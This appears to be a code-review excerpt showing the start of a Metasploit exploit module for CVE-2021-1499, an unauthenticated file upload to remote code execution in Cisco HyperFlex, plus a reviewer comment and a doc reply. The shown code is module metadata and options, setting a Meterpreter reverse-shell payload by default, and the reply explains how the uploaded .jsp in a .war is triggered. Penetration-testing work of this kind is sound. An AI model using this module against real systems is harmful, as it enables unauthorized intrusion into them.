modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload vulnerability in
+          Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
+          execute a payload as the Tomcat user.
+        },
+        'Author' => [
+          'Nikita Abramov',      # Discovery
+          'Mikhail Klyuchnikov', # Discovery
+          'jheysel-r7'           # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-1499'], # HyperFlex HX File Upload
+          ['URL', 'https://attackerkb.com/topics/Z2MeUsvSlT/cve-2021-1499']
+        ],
+        'DisclosureDate' => '2021-05-05',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        # 'Arch' => [ARCH_CMD, ARCH_JAVA],
+        'Privileged' => false, # Privesc left as an exercise for the reader
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ]
+          # ['Java Dropper',
+          #  'Platform'       => 'java',
+          #  'Arch'           => ARCH_JAVA,
+          #  'Version'        => Rex::Version.new('2.137'),
+          #  'Type'           => :java_dropper,
+          #  'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}
+          # ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('UPLOAD_FILE_NAME', [false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15))])
```

Comment:
This option is missing from the module docs. It would be helpful to have a bit of detail about what it is, and how it's used in the exploit.

Reply:
Thanks for pointing that out! Missed that, docs updated.
```
**UPLOAD_FILE_NAME**
This is the name of the .jsp file that is packaged inside the .war payload. The .jsp file is auto deployed on the tomcat
server and is then invoked via a GET request in order to execute the payload. (Random by default).
```